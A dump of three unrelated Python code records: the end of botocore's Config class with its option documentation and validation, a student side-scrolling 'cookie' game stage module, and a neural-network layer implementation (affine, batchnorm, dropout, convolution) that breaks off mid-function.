\". Allowed characters are\n ASCII alphanumerics and ``!$%&'*+-.^_`|~``. All other characters will\n be replaced by a ``-``.\n\n :type connect_timeout: float or int\n :param connect_timeout: The time in seconds till a timeout exception is\n thrown when attempting to make a connection. The default is 60\n seconds.\n\n :type read_timeout: float or int\n :param read_timeout: The time in seconds till a timeout exception is\n thrown when attempting to read from a connection. The default is\n 60 seconds.\n\n :type parameter_validation: bool\n :param parameter_validation: Whether parameter validation should occur\n when serializing requests. The default is True. You can disable\n parameter validation for performance reasons. Otherwise, it's\n recommended to leave parameter validation enabled.\n\n :type max_pool_connections: int\n :param max_pool_connections: The maximum number of connections to\n keep in a connection pool. If this value is not set, the default\n value of 10 is used.\n\n :type proxies: dict\n :param proxies: A dictionary of proxy servers to use by protocol or\n endpoint, e.g.:\n ``{'http': 'foo.bar:3128', 'http://hostname': 'foo.bar:4012'}``.\n The proxies are used on each request.\n\n :type proxies_config: dict\n :param proxies_config: A dictionary of additional proxy configurations.\n Valid keys are:\n\n * ``proxy_ca_bundle`` -- The path to a custom certificate bundle to use\n when establishing SSL/TLS connections with proxy.\n\n * ``proxy_client_cert`` -- The path to a certificate for proxy\n TLS client authentication.\n\n When a string is provided it is treated as a path to a proxy client\n certificate. When a two element tuple is provided, it will be\n interpreted as the path to the client certificate, and the path\n to the certificate key.\n\n * ``proxy_use_forwarding_for_https`` -- For HTTPS proxies,\n forward your requests to HTTPS destinations with an absolute\n URI. We strongly recommend you only use this option with\n trusted or corporate proxies. Value must be boolean.\n\n :type s3: dict\n :param s3: A dictionary of S3 specific configurations.\n Valid keys are:\n\n * ``use_accelerate_endpoint`` -- Refers to whether to use the S3\n Accelerate endpoint. The value must be a boolean. If True, the\n client will use the S3 Accelerate endpoint. If the S3 Accelerate\n endpoint is being used then the addressing style will always\n be virtual.\n\n * ``payload_signing_enabled`` -- Refers to whether or not to SHA256\n sign sigv4 payloads. By default, this is disabled for streaming\n uploads (UploadPart and PutObject).\n\n * ``addressing_style`` -- Refers to the style in which to address\n s3 endpoints. Values must be a string that equals one of:\n\n * ``auto`` -- Addressing style is chosen for user. Depending\n on the configuration of client, the endpoint may be addressed in\n the virtual or the path style. Note that this is the default\n behavior if no style is specified.\n\n * ``virtual`` -- Addressing style is always virtual. The name of the\n bucket must be DNS compatible or an exception will be thrown.\n Endpoints will be addressed as such: ``mybucket.s3.amazonaws.com``\n\n * ``path`` -- Addressing style is always by path. Endpoints will be\n addressed as such: ``s3.amazonaws.com/mybucket``\n\n * ``us_east_1_regional_endpoint`` -- Refers to what S3 endpoint to use\n when the region is configured to be us-east-1. 
          The value must be a string that equals one of:

          * ``regional`` -- Use the us-east-1.amazonaws.com endpoint if the
            client is configured to use the us-east-1 region.

          * ``legacy`` -- Use the s3.amazonaws.com endpoint if the client is
            configured to use the us-east-1 region. This is the default if
            the configuration option is not specified.

    :type retries: dict
    :param retries: A dictionary for configuration related to retry behavior.
        Valid keys are:

        * ``total_max_attempts`` -- An integer representing the maximum
          number of total attempts that will be made on a single request.
          This includes the initial request, so a value of 1 indicates that
          no requests will be retried. If ``total_max_attempts`` and
          ``max_attempts`` are both provided, ``total_max_attempts`` takes
          precedence. ``total_max_attempts`` is preferred over
          ``max_attempts`` because it maps to the ``AWS_MAX_ATTEMPTS``
          environment variable and the ``max_attempts`` config file value.

        * ``max_attempts`` -- An integer representing the maximum number of
          retry attempts that will be made on a single request. For example,
          setting this value to 2 will result in the request being retried
          at most two times after the initial request. Setting this value to
          0 will result in no retries ever being attempted after the initial
          request. If not provided, the number of retries will default to
          the value specified in the service model, which is typically four
          retries.

        * ``mode`` -- A string representing the type of retry mode botocore
          should use. Valid values are:

          * ``legacy`` -- The pre-existing retry behavior.

          * ``standard`` -- The standardized set of retry rules. This will
            also default to 3 max attempts unless overridden.

          * ``adaptive`` -- Retries with additional client-side throttling.

    :type client_cert: str, (str, str)
    :param client_cert: The path to a certificate for TLS client
        authentication.

        When a string is provided it is treated as a path to a client
        certificate to be used when creating a TLS connection.

        If a client key is to be provided alongside the client certificate,
        ``client_cert`` should be set to a tuple of length two where the
        first element is the path to the client certificate and the second
        element is the path to the certificate key.

    :type inject_host_prefix: bool
    :param inject_host_prefix: Whether host prefix injection should occur.

        Defaults to True.

        Setting this to False disables the injection of operation parameters
        into the prefix of the hostname. This is useful for clients providing
        custom endpoints that should not have their host prefix modified.

    :type use_dualstack_endpoint: bool
    :param use_dualstack_endpoint: Setting to True enables dualstack
        endpoint resolution.

        Defaults to None.

    :type use_fips_endpoint: bool
    :param use_fips_endpoint: Setting to True enables FIPS
        endpoint resolution.

        Defaults to None.

    :type ignore_configured_endpoint_urls: bool
    :param ignore_configured_endpoint_urls: Setting to True disables use
        of endpoint URLs provided via environment variables and
        the shared configuration file.

        Defaults to None.

    :type tcp_keepalive: bool
    :param tcp_keepalive: Enables the TCP Keep-Alive socket option used when
        creating new connections if set to True.

        Defaults to False.

    :type request_min_compression_size_bytes: int
    :param request_min_compression_size_bytes: The minimum size in bytes
        that a request body should be to trigger compression.
        All requests with streaming input that don't contain the
        ``requiresLength`` trait will be compressed regardless of this
        setting.

        Defaults to None.

    :type disable_request_compression: bool
    :param disable_request_compression: Disables request body compression if
        set to True.

        Defaults to None.
    """

    OPTION_DEFAULTS = OrderedDict(
        [
            ('region_name', None),
            ('signature_version', None),
            ('user_agent', None),
            ('user_agent_extra', None),
            ('user_agent_appid', None),
            ('connect_timeout', DEFAULT_TIMEOUT),
            ('read_timeout', DEFAULT_TIMEOUT),
            ('parameter_validation', True),
            ('max_pool_connections', MAX_POOL_CONNECTIONS),
            ('proxies', None),
            ('proxies_config', None),
            ('s3', None),
            ('retries', None),
            ('client_cert', None),
            ('inject_host_prefix', True),
            ('endpoint_discovery_enabled', None),
            ('use_dualstack_endpoint', None),
            ('use_fips_endpoint', None),
            ('ignore_configured_endpoint_urls', None),
            ('defaults_mode', None),
            ('tcp_keepalive', None),
            ('request_min_compression_size_bytes', None),
            ('disable_request_compression', None),
        ]
    )

    NON_LEGACY_OPTION_DEFAULTS = {
        'connect_timeout': None,
    }

    def __init__(self, *args, **kwargs):
        self._user_provided_options = self._record_user_provided_options(
            args, kwargs
        )

        # Merge the user-provided options onto the default options.
        config_vars = copy.copy(self.OPTION_DEFAULTS)
        defaults_mode = self._user_provided_options.get(
            'defaults_mode', 'legacy'
        )
        if defaults_mode != 'legacy':
            config_vars.update(self.NON_LEGACY_OPTION_DEFAULTS)
        config_vars.update(self._user_provided_options)

        # Set the attributes based on the config_vars.
        for key, value in config_vars.items():
            setattr(self, key, value)

        # Validate the s3 options.
        self._validate_s3_configuration(self.s3)

        self._validate_retry_configuration(self.retries)

    def _record_user_provided_options(self, args, kwargs):
        option_order = list(self.OPTION_DEFAULTS)
        user_provided_options = {}

        # Iterate through the kwargs passed to the constructor and
        # map valid keys to the dictionary.
        for key, value in kwargs.items():
            if key in self.OPTION_DEFAULTS:
                user_provided_options[key] = value
            # The key must exist in the available options.
            else:
                raise TypeError(f"Got unexpected keyword argument '{key}'")

        # The number of args should not be longer than the allowed
        # options.
        if len(args) > len(option_order):
            raise TypeError(
                f"Takes at most {len(option_order)} arguments ({len(args)} given)"
            )

        # Iterate through the args passed to the constructor and map
        # them to the appropriate keys.
        for i, arg in enumerate(args):
            # If a kwarg was also specified for this arg, error out.
            if option_order[i] in user_provided_options:
                raise TypeError(
                    f"Got multiple values for keyword argument '{option_order[i]}'"
                )
            user_provided_options[option_order[i]] = arg

        return user_provided_options

    def _validate_s3_configuration(self, s3):
        if s3 is not None:
            addressing_style = s3.get('addressing_style')
            if addressing_style not in ['virtual', 'auto', 'path', None]:
                raise InvalidS3AddressingStyleError(
                    s3_addressing_style=addressing_style
                )

    def _validate_retry_configuration(self, retries):
        valid_options = ('max_attempts', 'mode', 'total_max_attempts')
        valid_modes = ('legacy', 'standard', 'adaptive')
        if retries is not None:
            for key, value in retries.items():
                if key not in valid_options:
                    raise InvalidRetryConfigurationError(
                        retry_config_option=key,
                        valid_options=valid_options,
                    )
                if key == 'max_attempts' and value < 0:
                    raise InvalidMaxRetryAttemptsError(
                        provided_max_attempts=value,
                        min_value=0,
                    )
                if key == 'total_max_attempts' and value < 1:
                    raise InvalidMaxRetryAttemptsError(
                        provided_max_attempts=value,
                        min_value=1,
                    )
                if key == 'mode' and value not in valid_modes:
                    raise InvalidRetryModeError(
                        provided_retry_mode=value,
                        valid_modes=valid_modes,
                    )

    def merge(self, other_config):
        """Merges the config object with another config object.

        This will merge in all non-default values from the provided config
        and return a new config object.

        :type other_config: botocore.config.Config
        :param other_config: Another config object to merge with. The values
            in the provided config object will take precedence in the
            merging.

        :returns: A config object built from the merged values of both
            config objects.
        """
        # Make a copy of the current attributes in the config object.
        config_options = copy.copy(self._user_provided_options)

        # Merge in the user-provided options from the other config.
        config_options.update(other_config._user_provided_options)

        # Return a new config object with the merged properties.
        return Config(**config_options)
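
# A minimal usage sketch (added for illustration) of how Config options
# compose and how ``merge`` gives the second config precedence. The timeout
# and retry values below are arbitrary examples, not defaults of this module.
def _example_config_merge():
    base = Config(
        connect_timeout=5,
        read_timeout=60,
        retries={'max_attempts': 2, 'mode': 'standard'},
    )
    override = Config(read_timeout=120)
    merged = base.merge(override)
    # merge() returns a new Config; override's read_timeout wins, while
    # options only set on ``base`` are carried over unchanged.
    assert merged.read_timeout == 120
    assert merged.connect_timeout == 5
    return merged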
+{"seq_id": "548541204", "text": "import random\nimport json\nimport os\nimport time\n\nfrom cookie import *\nfrom back_ground import *\nfrom ground import *\nfrom obstacle import *\nfrom item import *\nfrom score import *\nimport game_framework\nimport title_state\nimport result_state\nimport stage1_select\nimport stage2_select\nimport stage3_select\nimport stage4_select\n\nname = \"MainState\"\n\ncookie = None\nbackground = None\nnomal_fork = None\nnomal_thorn = None\nspecial_fork = None\ndouble_thorn = None\nboard = None\nitem_jelly = None\nhp_jelly = None\nobject = []\nranking_data = []\ncurrent_time = 0.0\n\ndef collide(a, b):\n left_a, bottom_a, right_a, top_a = a.get_bb()\n left_b, bottom_b, right_b, top_b = b.get_bb()\n\n if left_a > right_b: return False\n if right_a < left_b: return False\n if top_a < bottom_b: return False\n if bottom_a > top_b: return False\n\n return True\n\ndef get_frame_time():\n\n global current_time\n\n frame_time = get_time() - current_time\n current_time += frame_time\n return frame_time\n\ndef enter():\n global cookie, background, ground, nomal_fork, nomal_thorn, special_fork, double_thorn, board, \\\n start, score_jelly, hp_jelly, font, objects, score, brave_cookie, ginger_brave_cookie, f, ranking_data\n\n cookie = stage1_select.get_cookie\n brave_cookie = stage1_select.brave_cookie_select\n ginger_brave_cookie = stage1_select.ginger_brave_cookie_select\n background = Stage1_Background(800, 600)\n ground = Stage1_Ground(800, 150)\n score = Score()\n board = Stage1_Board().create()\n nomal_fork = Stage1_Nomal_Fork().create()\n nomal_thorn = Stage1_Nomal_Thorn().create()\n special_fork = Stage1_Special_Fork().create()\n double_thorn = Stage1_Double_Thorn().create()\n score_jelly = Stage1_Score_Jelly().create()\n hp_jelly = Stage1_Hp_Jelly().create()\n objects = [nomal_fork, special_fork, nomal_thorn, double_thorn, score_jelly, hp_jelly, board]\n font = load_font('Resource\\\\ENCR10B.TTF')\n start = time.time()\n\n f = open('ranking_data.txt', 'r')\n ranking_data = json.load(f)\n f.close()\n\ndef exit():\n global cookie, background, ground, nomal_fork, nomal_thorn, special_fork, double_thorn, board, start, \\\n score_jelly, hp_jelly, objects, score\n del(cookie)\n del(background)\n del(ground)\n\n for list in objects:\n for dict in list:\n list.remove(dict)\n del(dict)\n del(list)\n\n end = time.time()\n\n print(\"Stage1 Clear Time : \", (end - start))\n\ndef pause():\n pass\n\n\ndef resume():\n pass\n\n\ndef handle_events():\n global cookie\n events = get_events()\n\n for event in events:\n if event.type == SDL_QUIT:\n game_framework.quit()\n\n elif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:\n game_framework.change_state(title_state)\n\n elif event.type == SDL_KEYDOWN and event.key == SDLK_2:\n game_framework.change_state(stage2_select)\n\n elif event.type == SDL_KEYDOWN and event.key == SDLK_3:\n game_framework.change_state(stage3_select)\n\n elif event.type == SDL_KEYDOWN and event.key == SDLK_4:\n game_framework.change_state(stage4_select)\n\n else:\n cookie.handle_events(event)\n\ndef update():\n global cookie, brave_cookie, ginger_brave_cookie, background, ground, nomal_fork, nomal_thorn, special_fork, double_thorn, board, \\\n score_jelly, hp_jelly, objects, score\n\n frame_time = get_frame_time()\n background.update(frame_time)\n ground.update(frame_time)\n score.stage1_score()\n cookie.update(frame_time)\n\n if brave_cookie == True and cookie.hp <= 0:\n cookie = Ginger_Brave_Cookie()\n if ginger_brave_cookie == True and cookie.hp <= 
        cookie = Brave_Cookie()

    # Identity checks ("is") are used below: comparing with "==" would match
    # any two lists with equal contents (e.g. two empty lists). Each list is
    # iterated over a copy because collisions may remove items from it. A
    # small self-check of collide() follows this file.
    for obj_list in objects:
        for obj in obj_list[:]:
            obj.update(frame_time)
            if collide(cookie, obj):
                if obj_list is score_jelly:
                    obj_list.remove(obj)
                    cookie.scoreSound(obj)
                elif obj_list is hp_jelly:
                    obj_list.remove(obj)
                    cookie.heal(obj)
                elif obj_list is board:
                    for board_obj in obj_list:
                        board_obj.state = "None"
                else:
                    cookie.state = "Collide"

    if background.map_size >= 55 and cookie.y == 200:
        game_framework.change_state(stage2_select)
    elif background.map_size >= 55 and cookie.y == 250:
        game_framework.change_state(stage3_select)
    if (Brave_Cookie.hp <= 0) and (Ginger_Brave_Cookie.hp <= 0):
        game_framework.change_state(result_state)


def draw():
    global cookie, background, ground, objects, score
    clear_canvas()
    background.draw()
    ground.draw()

    for obj_list in objects:
        for obj in obj_list:
            obj.draw()

    font.draw(100, 550, 'Score : %3.2d' % score.score, (255, 255, 255))
    cookie.draw()

    delay(0.03)
    update_canvas()
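
# A small self-check (added for illustration) of the axis-aligned
# bounding-box test in collide(). _Box is a hypothetical stand-in for the
# game objects, which only need to expose get_bb() returning
# (left, bottom, right, top).
class _Box:
    def __init__(self, left, bottom, right, top):
        self._bb = (left, bottom, right, top)

    def get_bb(self):
        return self._bb


def _example_collide():
    assert collide(_Box(0, 0, 10, 10), _Box(5, 5, 15, 15))       # overlapping
    assert not collide(_Box(0, 0, 10, 10), _Box(11, 0, 20, 10))  # disjoint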
+{"seq_id": "312266098", "text": "import numpy as np\nfrom scipy.signal import fftconvolve, convolve\nfrom itertools import product\n\ndef affine_forward(x, w, b):\n \"\"\"\n Computes the forward pass for an affine (fully-connected) layer.\n\n The input x has shape (N, d_1, ..., d_k) and contains a minibatch of N\n examples, where each example x[i] has shape (d_1, ..., d_k). We will\n reshape each input into a vector of dimension D = d_1 * ... * d_k, and\n then transform it to an output vector of dimension M.\n\n Inputs:\n - x: A numpy array containing input data, of shape (N, d_1, ..., d_k)\n - w: A numpy array of weights, of shape (D, M)\n - b: A numpy array of biases, of shape (M,)\n\n Returns a tuple of:\n - out: output, of shape (N, M)\n - cache: (x, w, b)\n \"\"\"\n cache = (x, w, b)\n x = x.reshape(x.shape[0], -1) # NxD\n out = x.dot(w) + b\n return out, cache\n\n\ndef affine_backward(dout, cache):\n \"\"\"\n Computes the backward pass for an affine layer.\n\n Inputs:\n - dout: Upstream derivative, of shape (N, M)\n - cache: Tuple of:\n - x: Input data, of shape (N, d_1, ... d_k)\n - w: Weights, of shape (D, M)\n - b: biases, of shape (M,\n\n Returns a tuple of:\n - dx: Gradient with respect to x, of shape (N, d1, ..., d_k)\n - dw: Gradient with respect to w, of shape (D, M)\n - db: Gradient with respect to b, of shape (M,)\n \"\"\"\n x, w, b = cache\n\n dx = dout.dot(w.T).reshape(x.shape)\n dw = x.reshape(x.shape[0], -1).T.dot(dout)\n db = dout.sum(axis=0)\n\n return dx, dw, db\n\n\ndef relu_forward(x):\n \"\"\"\n Computes the forward pass for a layer of rectified linear units (ReLUs).\n\n Input:\n - x: Inputs, of any shape\n\n Returns a tuple of:\n - out: Output, of the same shape as x\n - cache: x\n \"\"\"\n out = np.maximum(0, x)\n cache = x\n return out, cache\n\n\ndef relu_backward(dout, cache):\n \"\"\"\n Computes the backward pass for a layer of rectified linear units (ReLUs).\n\n Input:\n - dout: Upstream derivatives, of any shape\n - cache: Input x, of same shape as dout\n\n Returns:\n - dx: Gradient with respect to x\n \"\"\"\n dx, x = None, cache\n dout[np.where(x <= 0.)] = 0.\n dx = dout\n\n return dx\n\n\ndef batchnorm_forward(x, gamma, beta, bn_param):\n \"\"\"\n Forward pass for batch normalization.\n\n During training the sample mean and (uncorrected) sample variance are\n computed from minibatch statistics and used to normalize the incoming data.\n During training we also keep an exponentially decaying running mean of the mean\n and variance of each feature, and these averages are used to normalize data\n at test-time.\n\n At each timestep we update the running averages for mean and variance using\n an exponential decay based on the momentum parameter:\n\n running_mean = momentum * running_mean + (1 - momentum) * sample_mean\n running_var = momentum * running_var + (1 - momentum) * sample_var\n\n Note that the batch normalization paper suggests a different test-time\n behavior: they compute sample mean and variance for each feature using a\n large number of training images rather than using a running average. 

def batchnorm_forward(x, gamma, beta, bn_param):
    """
    Forward pass for batch normalization.

    During training the sample mean and (uncorrected) sample variance are
    computed from minibatch statistics and used to normalize the incoming
    data. During training we also keep an exponentially decaying running
    mean of the mean and variance of each feature, and these averages are
    used to normalize data at test-time.

    At each timestep we update the running averages for mean and variance
    using an exponential decay based on the momentum parameter:

    running_mean = momentum * running_mean + (1 - momentum) * sample_mean
    running_var = momentum * running_var + (1 - momentum) * sample_var

    Note that the batch normalization paper suggests a different test-time
    behavior: they compute sample mean and variance for each feature using a
    large number of training images rather than using a running average. For
    this implementation we have chosen to use running averages instead since
    they do not require an additional estimation step; the torch7
    implementation of batch normalization also uses running averages.

    Input:
    - x: Data of shape (N, D)
    - gamma: Scale parameter of shape (D,)
    - beta: Shift parameter of shape (D,)
    - bn_param: Dictionary with the following keys:
      - mode: 'train' or 'test'; required
      - eps: Constant for numeric stability
      - momentum: Constant for running mean / variance.
      - running_mean: Array of shape (D,) giving running mean of features
      - running_var: Array of shape (D,) giving running variance of features

    Returns a tuple of:
    - out: of shape (N, D)
    - cache: A tuple of values needed in the backward pass
    """
    mode = bn_param['mode']
    eps = bn_param.get('eps', 1e-5)
    momentum = bn_param.get('momentum', 0.9)

    N, D = x.shape
    running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))
    running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))

    out, cache = None, None
    if mode == 'train':
        var = np.var(x, axis=0)
        mean = x.mean(axis=0)
        x_shift = x - mean
        x_norm = x_shift/np.sqrt(var + eps)

        out = gamma*x_norm
        out += beta

        scale = (1. - momentum)
        running_mean *= momentum
        running_mean += scale*mean

        running_var *= momentum
        running_var += scale*var

        cache = (x_shift, x_norm, var + eps, gamma)

    elif mode == 'test':
        out = (x - running_mean)/np.sqrt(running_var + eps)
        out *= gamma
        out += beta

    else:
        raise ValueError('Invalid forward batchnorm mode "%s"' % mode)

    # Store the updated running means back into bn_param
    bn_param['running_mean'] = running_mean
    bn_param['running_var'] = running_var

    return out, cache

def batchnorm_backward(dout, cache):
    """
    Backward pass for batch normalization.

    For this implementation, you should write out a computation graph for
    batch normalization on paper and propagate gradients backward through
    intermediate nodes.

    Inputs:
    - dout: Upstream derivatives, of shape (N, D)
    - cache: Variable of intermediates from batchnorm_forward.

    Returns a tuple of:
    - dx: Gradient with respect to inputs x, of shape (N, D)
    - dgamma: Gradient with respect to scale parameter gamma, of shape (D,)
    - dbeta: Gradient with respect to shift parameter beta, of shape (D,)
    """
    # The simplified (alt) implementation below covers this case directly.
    return batchnorm_backward_alt(dout, cache)


def batchnorm_backward_alt(dout, cache):
    """
    Alternative backward pass for batch normalization.

    For this implementation you should work out the derivatives for the batch
    normalization backward pass on paper and simplify as much as possible. You
    should be able to derive a simple expression for the backward pass.

    Note: This implementation should expect to receive the same cache variable
    as batchnorm_backward, but might not use all of the values in the cache.

    Inputs / outputs: Same as batchnorm_backward
    """
    x_shift, x_norm, var_eps, gamma = cache
    dx_norm = gamma*dout

    dgamma = np.einsum('ij,ij->j', dout, x_norm)
    dbeta = np.sum(dout, axis=0)

    dx = dx_norm - np.mean(dx_norm, axis=0)
    dx -= x_shift*np.einsum('ij,ij->j', dx_norm, x_shift)/(var_eps*dx_norm.shape[0])
    dx /= np.sqrt(var_eps)

    return dx, dgamma, dbeta
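
# A minimal train/test round-trip (added for illustration) showing how the
# bn_param dict carries the running statistics between calls.
def _example_batchnorm():
    np.random.seed(0)
    x = np.random.randn(50, 4) * 3.0 + 7.0
    gamma, beta = np.ones(4), np.zeros(4)
    bn_param = {'mode': 'train'}
    out, _ = batchnorm_forward(x, gamma, beta, bn_param)
    # In train mode the output has (near-)zero mean per feature.
    assert np.allclose(out.mean(axis=0), 0.0, atol=1e-7)
    # Test mode reuses the running averages accumulated in bn_param.
    bn_param['mode'] = 'test'
    out_test, _ = batchnorm_forward(x, gamma, beta, bn_param)
    return out_test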

def dropout_forward(x, dropout_param):
    """
    Performs the forward pass for (inverted) dropout.

    Inputs:
    - x: Input data, of any shape
    - dropout_param: A dictionary with the following keys:
      - p: Dropout parameter. We keep each neuron output with probability p.
      - mode: 'test' or 'train'. If the mode is train, then perform dropout;
        if the mode is test, then just return the input.
      - seed: Seed for the random number generator. Passing seed makes this
        function deterministic, which is needed for gradient checking but not
        in real networks.

    Outputs:
    - out: Array of the same shape as x.
    - cache: A tuple (dropout_param, mask). In training mode, mask is the
      dropout mask that was used to multiply the input; in test mode, mask
      is None.
    """
    p, mode = dropout_param['p'], dropout_param['mode']
    if 'seed' in dropout_param:
        np.random.seed(dropout_param['seed'])

    mask = None
    out = None

    if mode == 'train':
        # Inverted dropout: scale by 1/p at train time so that no rescaling
        # is needed at test time.
        mask = (np.random.rand(*x.shape) < p)/p
        out = x*mask
    elif mode == 'test':
        out = x

    cache = (dropout_param, mask)
    out = out.astype(x.dtype, copy=False)

    return out, cache


def dropout_backward(dout, cache):
    """
    Perform the backward pass for (inverted) dropout.

    Inputs:
    - dout: Upstream derivatives, of any shape
    - cache: (dropout_param, mask) from dropout_forward.
    """
    dropout_param, mask = cache
    mode = dropout_param['mode']

    dx = None
    if mode == 'train':
        dx = mask*dout
    elif mode == 'test':
        dx = dout
    return dx


def flip_ndarray(x):
    """ Reverse the positions of the entries of the input array along all of its axes.

    Parameters
    ----------
    x : numpy.ndarray

    Returns
    -------
    out : numpy.ndarray
        A view of x with all of its axes reversed. Since a view is returned, this operation is O(1).

    Example
    -------
    x = array([[1, 2, 3],
               [4, 5, 6]])
    flip_ndarray(x)
    >> array([[6, 5, 4],
              [3, 2, 1]])"""
    loc = tuple(slice(None, None, -1) for i in range(x.ndim))
    return x[loc]

def nd_convolve(dat, conv_kernel, stride, outshape=None):
    """ Perform a convolution of two ndarrays, using a specified stride.

    Parameters
    ----------
    dat : numpy.ndarray
        Array to be convolved over.
    conv_kernel : numpy.ndarray
        Kernel used to perform convolution.
    stride : Union[Iterable[int, ...], Dict[int, int], int]
        Step sizes used while sliding the kernel during the convolution.
         - If a dictionary is provided, then it is used to map (axis-index -> stride-value). If an
           axis is not specified in the dictionary keys, then a stride of 1 is used along that axis.
         - If an iterable is provided, it must provide an explicit stride value for each axis (in order
           of ascending axis-index).
         - If a single stride value is specified, that value is used for every axis.

    outshape : Optional[Tuple[int, ...]]
        Provide the known output shape of the convolution, allowing the function to bypass
        sanity checks and some initial computations.

    Returns
    -------
    out : numpy.ndarray
        An array of the resulting convolution.
    """
    if np.max(dat.shape) >= 500:
        conv = fftconvolve
    else:
        conv = convolve

    if type(stride) is dict:
        stride_gen = (stride.get(key, 1) for key in range(dat.ndim))
    elif hasattr(stride, '__iter__'):
        stride_gen = stride
    else:
        stride_gen = (stride for i in range(dat.ndim))
    stride = np.fromiter(stride_gen, dtype=int)

    if outshape is None:
        outshape = get_outshape(dat.shape, conv_kernel.shape, stride)

    full_conv = conv(dat, conv_kernel, mode='valid')

    if np.all(stride == 1):
        return full_conv

    # all index positions to down-sample the convolution, given stride > 1;
    # materialized as a tuple so it can be used for advanced indexing.
    all_pos = tuple(zip(*product(*(stride[n]*np.arange(i) for n, i in enumerate(outshape)))))
    out = np.zeros(outshape, dtype=dat.dtype)
    out.flat = full_conv[all_pos]
    return out


def get_outshape(dat_shape, kernel_shape, stride):
    """ Returns the shape of the ndarray resulting from the convolution, using specified stride,
    of two ndarrays whose shapes are specified.

    Parameters
    ----------
    dat_shape : Iterable[int, ...]
        Shape of array to be convolved over.
    kernel_shape : Iterable[int, ...]
        Shape of kernel used to perform convolution.
    stride : Union[int, Iterable[int, ...]] ( > 0)
        Step size used while sliding the kernel during the convolution.

    Returns
    -------
    out : numpy.ndarray([int, ...])
        Shape of the array resulting from the convolution."""
    dat_shape = np.array(dat_shape)
    kernel_shape = np.array(kernel_shape)

    if hasattr(stride, '__iter__'):
        stride = np.fromiter(stride, dtype=float)
        assert len(stride) == len(dat_shape), 'The stride iterable must provide a stride value for each dat axis.'
    else:
        stride = float(stride)
    assert len(dat_shape) == len(kernel_shape), "kernel and data must have same number of dimensions"

    outshape = (dat_shape - kernel_shape)/stride + 1.
    for num in outshape:
        assert num.is_integer(), num
    outshape = np.rint(outshape).astype(int)

    return outshape
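
# The docstring formula in action (added for illustration):
# out = (dat - kernel)/stride + 1 along every axis.
def _example_get_outshape():
    # A 7x7 input convolved with a 3x3 kernel at stride 2 gives 3x3 output.
    assert tuple(get_outshape((7, 7), (3, 3), 2)) == (3, 3)
    # Per-axis strides are also accepted.
    assert tuple(get_outshape((9, 7), (3, 3), (2, 1))) == (4, 5)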

def padder(dat, pad, skip_axes=[0]):
    """ Returns an array padded with zeros with specified depth on both sides of each axis. A list of
    axes can be specified, which will not receive any padding.

    Parameters
    ----------
    dat : numpy.ndarray
        Array to be padded
    pad : int ( >= 0)
        Padding depth to be used on each end of a padding axis.
    skip_axes : Union[int, Iterable[int, ...]]
        The indices corresponding to axes that will not be padded.

    Returns
    -------
    out : numpy.ndarray
        Array padded with zeros."""
    assert pad >= 0 and type(pad) == int
    if pad == 0:
        return dat

    if type(skip_axes) == int:
        skip_axes = [skip_axes]
    assert hasattr(skip_axes, '__iter__')
    padding = [(pad, pad) for i in range(dat.ndim)]

    for ax in skip_axes:
        padding[ax] = (0, 0)

    return np.pad(dat, padding, mode='constant').astype(dat.dtype)


def conv_forward_naive(x, w, b, conv_param):
    """
    A naive implementation of the forward pass for a convolutional layer.

    The input consists of N data points, each with C channels, height H and
    width W. We convolve each input with F different filters, where each
    filter spans all C channels and has height HH and width WW.

    Input:
    - x: Input data of shape (N, C, H, W)
    - w: Filter weights of shape (F, C, HH, WW)
    - b: Biases, of shape (F,)
    - conv_param: A dictionary with the following keys:
      - 'stride': The number of pixels between adjacent receptive fields in
        the horizontal and vertical directions.
      - 'pad': The number of pixels that will be used to zero-pad the input.

    Returns a tuple of:
    - out: Output data, of shape (N, F, H', W') where H' and W' are given by
      H' = 1 + (H + 2 * pad - HH) / stride
      W' = 1 + (W + 2 * pad - WW) / stride
    - cache: (x, w, b, conv_param)
    """
    pad_x = padder(x, conv_param['pad'], skip_axes=[0, 1])
    conv_out_shape = get_outshape(pad_x[0].shape, w[0].shape, conv_param['stride'])
    out = np.zeros((x.shape[0], w.shape[0], conv_out_shape[-2], conv_out_shape[-1]))

    for nk, kernel in enumerate(w):
        # note: we are actually computing a correlation, not a convolution,
        # so the kernel is flipped before calling the convolution routine.
        conv_kernel = flip_ndarray(kernel)
        for nd, dat in enumerate(pad_x):
            out[nd, nk, :, :] = nd_convolve(dat, conv_kernel, conv_param['stride'], conv_out_shape)
        out[:, nk:nk+1, :, :] += b[nk]

    cache = (x, w, b, conv_param)
    return out, cache
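
# A shape check (added for illustration) for the naive convolution: with
# pad=1 and stride=2, a 2x3x7x7 input and 4 filters of shape 3x3x3 give
# H' = W' = 1 + (7 + 2*1 - 3)/2 = 4.
def _example_conv_forward():
    x = np.random.randn(2, 3, 7, 7)
    w = np.random.randn(4, 3, 3, 3)
    b = np.random.randn(4)
    out, _ = conv_forward_naive(x, w, b, {'stride': 2, 'pad': 1})
    assert out.shape == (2, 4, 4, 4)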

def conv_backward_naive(dout, cache):
    """
    A naive implementation of the backward pass for a convolutional layer.

    Inputs:
    - dout: Upstream derivatives.
    - cache: A tuple of (x, w, b, conv_param) as in conv_forward_naive

    Returns a tuple of:
    - dx: Gradient with respect to x
    - dw: Gradient with respect to w
    - db: Gradient with respect to b
    """
    x, w, b, conv_param = cache

    dx = np.zeros_like(x, dtype=x.dtype)
    dw = np.zeros_like(w, dtype=w.dtype)
    db = np.sum(dout, axis=(0, 2, 3))

    pad = conv_param['pad']
    stride = conv_param['stride']

    npad = np.array([0] + [pad for i in range(x[0].ndim - 1)])
    outshape = (np.array(x[0].shape) - np.array(w[0].shape) + 2.*npad)/float(stride) + 1.
    outshape = np.round(outshape).astype(int)

    # all positions to place the kernel
    all_pos = list(product(*[stride*np.arange(i) for i in outshape]))
    all_slices = [tuple(slice(start, start + w[0].shape[i]) for i, start in enumerate(j)) for j in all_pos]

    if pad:
        pad_ax = [(0, 0)] + [(pad, pad) for i in range(x[0].ndim - 1)]

    for nk, kernel in enumerate(w):  # iterate over all kernels
        dx_kernel = np.zeros(x.shape, dtype=x.dtype)
        dkernel = np.zeros_like(kernel, dtype=kernel.dtype)
        for nd, dat in enumerate(x):  # iterate over each piece of data to be convolved
            if pad:
                dat = np.pad(dat, pad_ax, mode='constant').astype(dat.dtype)

            dy = dout[nd, nk][np.newaxis, :, :]
            ddat = np.zeros((x[0].shape[0], x[0].shape[1] + 2*pad, x[0].shape[2] + 2*pad), dtype=x[0].dtype)

            for i, slices in enumerate(all_slices):
